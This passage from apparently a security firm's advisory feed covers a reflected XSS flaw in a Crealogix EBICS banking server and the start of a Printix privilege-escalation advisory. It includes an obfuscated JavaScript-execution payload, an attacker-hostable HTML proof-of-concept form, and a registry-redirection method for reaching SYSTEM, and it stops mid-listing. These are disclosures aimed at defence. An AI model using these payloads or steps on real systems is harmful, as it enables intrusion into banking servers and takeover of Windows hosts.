&lt;a id="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-3" name="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-3" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-3"&gt;&lt;/a&gt;Content-Type: text/html; charset=utf-8
&lt;a id="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-4" name="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-4" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-4"&gt;&lt;/a&gt;Date: Sat, 13 Aug 2022 13:12:03 GMT
&lt;a id="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-5" name="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-5" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-5"&gt;&lt;/a&gt;Connection: close
&lt;a id="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-6" name="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-6" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-6"&gt;&lt;/a&gt;Vary: Accept-Encoding
&lt;a id="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-7" name="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-7" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-7"&gt;&lt;/a&gt;Content-Length: 309
&lt;a id="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-8" name="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-8" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-8"&gt;&lt;/a&gt;
&lt;a id="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-9" name="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-9" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-9"&gt;&lt;/a&gt;System.Exception: Unknown ebicsVersion '&amp;lt;a autofocus onfocus=print(1) href&amp;gt;&amp;lt;/a&amp;gt;'.
&lt;a id="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-10" name="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-10" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-10"&gt;&lt;/a&gt;   at EBICSServer.EbicsNamespaces.GetEbicsXmlns(String ebicsVersion)
&lt;a id="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-11" name="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-11" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-11"&gt;&lt;/a&gt;   at EBICSServer.EbicResponse..ctor(String ebicsVersion, String orderType, String partnerId)
&lt;a id="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-12" name="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-12" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-12"&gt;&lt;/a&gt;   at EBICSServer.Ebics.Page_Load(Object sender, EventArgs e)
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To achieve arbitrary JavaScript code execution, the following payload can be used instead:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_fd743a631e4b4954b5cd729b496c4656-1" name="rest_code_fd743a631e4b4954b5cd729b496c4656-1" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_fd743a631e4b4954b5cd729b496c4656-1"&gt;&lt;/a&gt;&amp;lt;ebicsUnsecuredRequest xmlns="urn:org:ebics:H004" Revision="1" Version="&amp;amp;lt;a autofocus onfocus='a=&amp;amp;quot;e&amp;amp;quot;;a+=&amp;amp;quot;val(decodeURIComponent(location.hash.slice(1)))&amp;amp;quot;;b=&amp;amp;quot;cons&amp;amp;quot;;b+=&amp;amp;quot;tructor&amp;amp;quot;;true[b][b](a)()' href&amp;amp;gt;"&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The server will respond with the following HTTP body:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_1f7440e8cec14251a498b691ce1ea259-1" name="rest_code_1f7440e8cec14251a498b691ce1ea259-1" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_1f7440e8cec14251a498b691ce1ea259-1"&gt;&lt;/a&gt; System.Exception: Unknown ebicsVersion '&amp;lt;a autofocus onfocus='a="e";a+="val(decodeURIComponent(location.hash.slice(1)))";b="cons";b+="tructor";true[b][b](a)()' href&amp;gt;'.
&lt;a id="rest_code_1f7440e8cec14251a498b691ce1ea259-2" name="rest_code_1f7440e8cec14251a498b691ce1ea259-2" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_1f7440e8cec14251a498b691ce1ea259-2"&gt;&lt;/a&gt;at EBICSServer.EbicsNamespaces.GetEbicsXmlns(String ebicsVersion)
&lt;a id="rest_code_1f7440e8cec14251a498b691ce1ea259-3" name="rest_code_1f7440e8cec14251a498b691ce1ea259-3" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_1f7440e8cec14251a498b691ce1ea259-3"&gt;&lt;/a&gt;at EBICSServer.EbicResponse..ctor(String ebicsVersion, String orderType, String partnerId)
&lt;a id="rest_code_1f7440e8cec14251a498b691ce1ea259-4" name="rest_code_1f7440e8cec14251a498b691ce1ea259-4" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_1f7440e8cec14251a498b691ce1ea259-4"&gt;&lt;/a&gt;at EBICSServer.Ebics.Page_Load(Object sender, EventArgs e)
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In this example the attacker's payload can be put in the URLs hash part and be used to load arbitrary JavaScript.&lt;/p&gt;
&lt;p&gt;To exploit this issue in regular browsers, an attacker can host the following HTML on their website:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_cae27bb2db05412a91cdbdf2939bb835-1" name="rest_code_cae27bb2db05412a91cdbdf2939bb835-1" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_cae27bb2db05412a91cdbdf2939bb835-1"&gt;&lt;/a&gt;&amp;lt;html&amp;gt;
&lt;a id="rest_code_cae27bb2db05412a91cdbdf2939bb835-2" name="rest_code_cae27bb2db05412a91cdbdf2939bb835-2" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_cae27bb2db05412a91cdbdf2939bb835-2"&gt;&lt;/a&gt;  &amp;lt;!-- PoC - generated by Burp Suite Professional --&amp;gt;
&lt;a id="rest_code_cae27bb2db05412a91cdbdf2939bb835-3" name="rest_code_cae27bb2db05412a91cdbdf2939bb835-3" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_cae27bb2db05412a91cdbdf2939bb835-3"&gt;&lt;/a&gt;  &amp;lt;body&amp;gt;
&lt;a id="rest_code_cae27bb2db05412a91cdbdf2939bb835-4" name="rest_code_cae27bb2db05412a91cdbdf2939bb835-4" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_cae27bb2db05412a91cdbdf2939bb835-4"&gt;&lt;/a&gt;  &amp;lt;script&amp;gt;history.pushState('', '', '/')&amp;lt;/script&amp;gt;
&lt;a id="rest_code_cae27bb2db05412a91cdbdf2939bb835-5" name="rest_code_cae27bb2db05412a91cdbdf2939bb835-5" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_cae27bb2db05412a91cdbdf2939bb835-5"&gt;&lt;/a&gt;    &amp;lt;form action="https://www.example.org/ebics-server/ebics.aspx#alert(123)" method="POST" enctype="text/plain"&amp;gt;
&lt;a id="rest_code_cae27bb2db05412a91cdbdf2939bb835-6" name="rest_code_cae27bb2db05412a91cdbdf2939bb835-6" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_cae27bb2db05412a91cdbdf2939bb835-6"&gt;&lt;/a&gt;      &amp;lt;input type="hidden" name="&amp;amp;lt;&amp;amp;#63;xml&amp;amp;#32;version" value="&amp;amp;quot;1&amp;amp;#46;0&amp;amp;quot;&amp;amp;#32;encoding&amp;amp;#61;&amp;amp;quot;utf&amp;amp;#45;8&amp;amp;quot;&amp;amp;#32;standalone&amp;amp;#61;&amp;amp;quot;no&amp;amp;quot;&amp;amp;#63;&amp;amp;gt;&amp;amp;#13;&amp;amp;#10;&amp;amp;lt;ebicsUnsecuredRequest&amp;amp;#32;xmlns&amp;amp;#61;&amp;amp;quot;urn&amp;amp;#58;org&amp;amp;#58;ebics&amp;amp;#58;H004&amp;amp;quot;&amp;amp;#32;Revision&amp;amp;#61;&amp;amp;quot;1&amp;amp;quot;&amp;amp;#32;Version&amp;amp;#61;&amp;amp;quot;&amp;amp;amp;lt&amp;amp;#59;a&amp;amp;#32;autofocus&amp;amp;#32;onfocus&amp;amp;#61;&amp;amp;apos;a&amp;amp;#61;&amp;amp;amp;quot&amp;amp;#59;e&amp;amp;amp;quot&amp;amp;#59;&amp;amp;#59;a&amp;amp;#43;&amp;amp;#61;&amp;amp;amp;quot&amp;amp;#59;val&amp;amp;#40;decodeURIComponent&amp;amp;#40;location&amp;amp;#46;hash&amp;amp;#46;slice&amp;amp;#40;1&amp;amp;#41;&amp;amp;#41;&amp;amp;#41;&amp;amp;amp;quot&amp;amp;#59;&amp;amp;#59;b&amp;amp;#61;&amp;amp;amp;quot&amp;amp;#59;cons&amp;amp;amp;quot&amp;amp;#59;&amp;amp;#59;b&amp;amp;#43;&amp;amp;#61;&amp;amp;amp;quot&amp;amp;#59;tructor&amp;amp;amp;quot&amp;amp;#59;&amp;amp;#59;true&amp;amp;#91;b&amp;amp;#93;&amp;amp;#91;b&amp;amp;#93;&amp;amp;#40;a&amp;amp;#41;&amp;amp;#40;&amp;amp;#41;&amp;amp;apos;&amp;amp;#32;href&amp;amp;amp;gt&amp;amp;#59;&amp;amp;quot;&amp;amp;gt;&amp;amp;lt;header&amp;amp;#32;authenticate&amp;amp;#61;&amp;amp;quot;true&amp;amp;quot;&amp;amp;gt;&amp;amp;lt;static&amp;amp;gt;&amp;amp;lt;HostID&amp;amp;gt;XXX&amp;amp;lt;&amp;amp;#47;HostID&amp;amp;gt;&amp;amp;lt;PartnerID&amp;amp;gt;XXX&amp;amp;lt;&amp;amp;#47;PartnerID&amp;amp;gt;&amp;amp;lt;UserID&amp;amp;gt;XXX&amp;amp;lt;&amp;amp;#47;UserID&amp;amp;gt;&amp;amp;lt;Product&amp;amp;#32;InstituteID&amp;amp;#61;&amp;amp;quot;XXX&amp;amp;quot;&amp;amp;#32;Language&amp;amp;#61;&amp;amp;quot;de&amp;amp;quot;&amp;amp;gt;XXX&amp;amp;lt;&amp;amp;#47;Product&amp;amp;gt;&amp;amp;lt;OrderDetails&amp;amp;gt;&amp;amp;lt;OrderType&amp;amp;gt;XXX&amp;amp;lt;&amp;amp;#47;OrderType&amp;amp;gt;&amp;amp;lt;OrderAttribute&amp;amp;gt;XXX&amp;amp;lt;&amp;amp;#47;OrderAttribute&amp;amp;gt;&amp;amp;lt;&amp;amp;#47;OrderDetails&amp;amp;gt;&amp;amp;lt;SecurityMedium&amp;amp;gt;0000&amp;amp;lt;&amp;amp;#47;SecurityMedium&amp;amp;gt;&amp;amp;lt;&amp;amp;#47;static&amp;amp;gt;&amp;amp;lt;mutable&amp;amp;#47;&amp;amp;gt;&amp;amp;lt;&amp;amp;#47;header&amp;amp;gt;&amp;amp;lt;body&amp;amp;gt;&amp;amp;lt;DataTransfer&amp;amp;gt;&amp;amp;lt;OrderData&amp;amp;gt;XXX&amp;amp;lt;&amp;amp;#47;OrderData&amp;amp;gt;&amp;amp;lt;&amp;amp;#47;DataTransfer&amp;amp;gt;&amp;amp;lt;&amp;amp;#47;body&amp;amp;gt;&amp;amp;lt;&amp;amp;#47;ebicsUnsecuredRequest&amp;amp;gt;" /&amp;gt;
&lt;a id="rest_code_cae27bb2db05412a91cdbdf2939bb835-7" name="rest_code_cae27bb2db05412a91cdbdf2939bb835-7" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_cae27bb2db05412a91cdbdf2939bb835-7"&gt;&lt;/a&gt;      &amp;lt;input type="submit" value="Submit request" /&amp;gt;
&lt;a id="rest_code_cae27bb2db05412a91cdbdf2939bb835-8" name="rest_code_cae27bb2db05412a91cdbdf2939bb835-8" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_cae27bb2db05412a91cdbdf2939bb835-8"&gt;&lt;/a&gt;    &amp;lt;/form&amp;gt;
&lt;a id="rest_code_cae27bb2db05412a91cdbdf2939bb835-9" name="rest_code_cae27bb2db05412a91cdbdf2939bb835-9" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_cae27bb2db05412a91cdbdf2939bb835-9"&gt;&lt;/a&gt;  &amp;lt;/body&amp;gt;
&lt;a id="rest_code_cae27bb2db05412a91cdbdf2939bb835-10" name="rest_code_cae27bb2db05412a91cdbdf2939bb835-10" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_cae27bb2db05412a91cdbdf2939bb835-10"&gt;&lt;/a&gt;&amp;lt;/html&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If and how this could be exploited in EBICS clients was not analysed (see impact discussion).&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition"&gt;
&lt;h2&gt;Precondition&lt;/h2&gt;
&lt;p&gt;There are no special preconditions for exploitation except for the usual reflected XSS preconditions, mostly requiring user interaction. The preconditions vary greatly on the exploited scenario (see impact discussion).&lt;/p&gt;
&lt;/section&gt;
&lt;section id="recommendation"&gt;
&lt;h2&gt;Recommendation&lt;/h2&gt;
&lt;p&gt;Pentagrid recommends Crealogix to:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Change the responded &lt;cite&gt;Content-Type&lt;/cite&gt; to &lt;cite&gt;text/plain&lt;/cite&gt;. If this is feasible has to be evaluated and tested with different EBICS clients.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It is recommended to prevent the server from replying with detailed error messages that are not part of the EBICS standard.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It is recommended to use the correct context escaping depending on the context. If &lt;cite&gt;text/html&lt;/cite&gt; is used in the response, the user-supplied values could be HTML entity encoded.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Further investigate if the EBICS server should be redesigned to support browser-based EBICS clients. This would require further security measures such as adding HTTP security headers (HSTS, CSP, etc.).&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Pentagrid recommends affected customers to:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Update to version 7.1 and/or apply patches that were provided by Crealogix.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Check the version in the request in the WAF and reject invalid versions in the WAF already. If you are using the OWASP Core Rule Set (CRS), there is an &lt;a class="reference external" href="https://github.com/coreruleset/coreruleset/issues/2847"&gt;open ticket to adjust WAF rules&lt;/a&gt; to detect this attack.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Prevent error messages being returned from the EBICS server to the client side by using a WAF rule.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="credits"&gt;
&lt;h2&gt;Credits&lt;/h2&gt;
&lt;p&gt;The vulnerability has been found by Tobias Ospelt (Pentagrid).&lt;/p&gt;
&lt;p&gt;We would like to thank Crealogix for the professional handling of the security issue.&lt;/p&gt;
&lt;/section&gt;</description><category>Advisory</category><category>Exploit</category><guid>https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/</guid><pubDate>Mon, 10 Oct 2022 09:00:00 GMT</pubDate></item><item><title>Vulnerabilities in Printix Cloud Print Management</title><link>https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;figure&gt;&lt;img src="https://www.pentagrid.ch/images/202208_printix_code_exec.png"&gt;&lt;/figure&gt; &lt;p&gt;During a penetation test of a cloud environment, Pentagrid observed
vulnerabilities in the cloud printing solution developed by Printix.net ApS, a Kofax subsidiary.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;section id="impact"&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;These vulnerabilities lead to an elevation of privileges to &lt;code class="docutils literal"&gt;SYSTEM&lt;/code&gt; and access to other user's printed documents.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="timeline"&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;2022-05-05: Initial contact of Printix team via E-mail to &lt;a class="reference external" href="mailto:info@printix.net"&gt;info@printix.net&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-05-12: Sent reminder via Twitter to @printixnet and @Kofax.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-05-19: Notified a founder and the CEO via E-mail.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-05-20: Printix replied that the &lt;a class="reference external" href="mailto:info@printix.net"&gt;info@printix.net&lt;/a&gt; is not monitored for security and that the E-mail was initially deleted.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-05-20: Pentagrid recommends following RFC 9116. Out of courtesy the 14 days feedback limit is extended to 24 May EOD to provide feedback, which steps are planned and when this will happen.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-05-22: Printix replies they plan to solve the problems as soon as possible and mentions a start in the week of 2022-05-30.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-05-23: Pentagrid communicates disclosure deadline 2022-08-03 and asks for a detailed plan (fixes, release of updates, estimates on how many customers have a patched state on 2022-08-03).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-05-31: Printix replies with a fix prioritization, which changes are planned, and that a rollout is planned for July.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-08-01: Pentagrid asked for a status.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-08-02: Printix confirmed that they adressed issues according to their plan with release 1.3.1169, which is in testing stage and that Printix needs 2-3 weeks for public deployment.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-08-11: Pentagrid postponed publication until 2022-08-18.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-08-18: CVE-2022-35167 was assigned to one of the issues.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-08-18: Advisory published.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="affected-components"&gt;
&lt;h2&gt;Affected Components&lt;/h2&gt;
&lt;p&gt;These vulnerabilities have been observed in the Printix client version 1.3.1149.0 for Windows and the corresponding cloud portal at the time of discovery.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="vulnerabilities"&gt;
&lt;h2&gt;Vulnerabilities&lt;/h2&gt;
&lt;section id="printix-registry-keys-not-read-write-protected-cve-2022-35167"&gt;
&lt;h3&gt;1. Printix registry keys not read/write protected (CVE-2022-35167)&lt;/h3&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, 7.8 High&lt;/pre&gt;
&lt;p&gt;After installing Printix on Windows, Registry keys belonging to each user are accessible to all other users on the system and can be modified.&lt;/p&gt;
&lt;section id="impact-1"&gt;
&lt;h4&gt;Impact&lt;/h4&gt;
&lt;p&gt;An attacker is able to read tokens of other users and can change program parameters,
such as dependent libraries, external binary dependencies or the uninstallation
script that gets executed when the application is removed from the system.
Ultimately, tampering with the configuration of Printix in the registry can lead to an elevation of privileges.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details"&gt;
&lt;h4&gt;Technical Details&lt;/h4&gt;
&lt;p&gt;The Printix software is running as a background service and a client application, which,
on Windows systems, is reading its configuration values from registry keys at
&lt;code class="docutils literal"&gt;HKLM/SOFTWARE/printix.net/Printix Client/CurrentVersion&lt;/code&gt;.
Every user has their own subkey within this registry key.&lt;/p&gt;
&lt;p&gt;Every regular user can read the Printix registry keys of other users that were logged in
to the same computer at least once.
One of the entries within the key is an access token.
Other global entries within the printix.net registry key include the paths of
certain third-party libraries and binaries the application relies on.
An attacker could overwrite the paths and let them point to their own,
malicious libraries, which consequently might be loaded by the application.&lt;/p&gt;
&lt;section id="weak-registry-key-permissions-enable-privilege-escalation"&gt;
&lt;h5&gt;1.1 Weak registry key permissions enable privilege escalation&lt;/h5&gt;
&lt;p&gt;A clean installation of the Printix client was done to analyse the default configuration as shipped by the developers.
This revealed that a privilege escalation is possible by changing the registry keys ProgramDir and DataDir.&lt;/p&gt;
&lt;p&gt;After installation they initially both point to a write-protected location within the &lt;code class="docutils literal"&gt;Program Files&lt;/code&gt; directory.
As the keys are write-accessible by regular users, it is possible to change them, for example to &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;C:\temp&lt;/span&gt;&lt;/code&gt;.
After doing this, and restarting the Printix service, new configuration files are created by the service in that directory.
One of the new files is called &lt;code class="docutils literal"&gt;PrintixServiceTask.xml&lt;/code&gt;, which is a Microsoft Task definition, describing the Printix service running on the machine.
After changing the paths to &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;C:\temp&lt;/span&gt;&lt;/code&gt; the file is also read from this location, and as the new directory is not write-protected, the file can also be modified by any regular user.&lt;/p&gt;
&lt;p&gt;One part of the XML file is the command that will be run by Windows to start the service as shown in the following listing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Source:&lt;/strong&gt; &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;C:\temp\PrintixServiceTask.xml&lt;/span&gt;&lt;/code&gt;&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-1" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-1" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-1"&gt;&lt;/a&gt;&amp;lt;?xml version="1.0" encoding="UTF-16"?&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-2" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-2" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-2"&gt;&lt;/a&gt;&amp;lt;Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-3" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-3" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-3"&gt;&lt;/a&gt;    &amp;lt;RegistrationInfo&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-4" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-4" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-4"&gt;&lt;/a&gt;        &amp;lt;Date&amp;gt;2017-09-21T13:43:01&amp;lt;/Date&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-5" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-5" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-5"&gt;&lt;/a&gt;        &amp;lt;Author&amp;gt;Printix&amp;lt;/Author&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-6" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-6" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-6"&gt;&lt;/a&gt;        &amp;lt;URI&amp;gt;\Printix Service&amp;lt;/URI&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-7" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-7" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-7"&gt;&lt;/a&gt;    &amp;lt;/RegistrationInfo&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-8" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-8" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-8"&gt;&lt;/a&gt;    &amp;lt;Triggers&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-9" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-9" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-9"&gt;&lt;/a&gt;        &amp;lt;EventTrigger&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-10" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-10" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-10"&gt;&lt;/a&gt;        &amp;lt;Enabled&amp;gt;true&amp;lt;/Enabled&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-11" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-11" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-11"&gt;&lt;/a&gt;        &amp;lt;Subscription&amp;gt;&amp;amp;lt;QueryList&amp;amp;gt;&amp;amp;lt;Query Id="0" Path="Application"&amp;amp;gt;&amp;amp;lt;Select Path="Application"&amp;amp;gt;*[System[Provider[@Name='PrintixClient'] and EventID=249]]&amp;amp;lt;/Select&amp;amp;gt;&amp;amp;lt;/Query&amp;amp;gt;&amp;amp;lt;/QueryList&amp;amp;gt;&amp;lt;/Subscription&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-12" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-12" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-12"&gt;&lt;/a&gt;        &amp;lt;/EventTrigger&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-13" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-13" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-13"&gt;&lt;/a&gt;    &amp;lt;/Triggers&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-14" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-14" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-14"&gt;&lt;/a&gt;    &amp;lt;Principals&amp;gt;
&lt;a id="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-15" name="rest_code_4e7f706df1004b48b0cf1abeb0dd1838-15" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_4e7f706df1004b48b0cf1abeb0dd1838-15"&gt;&lt;/a&gt;        &amp;lt;Principal id="Author"&amp;gt;
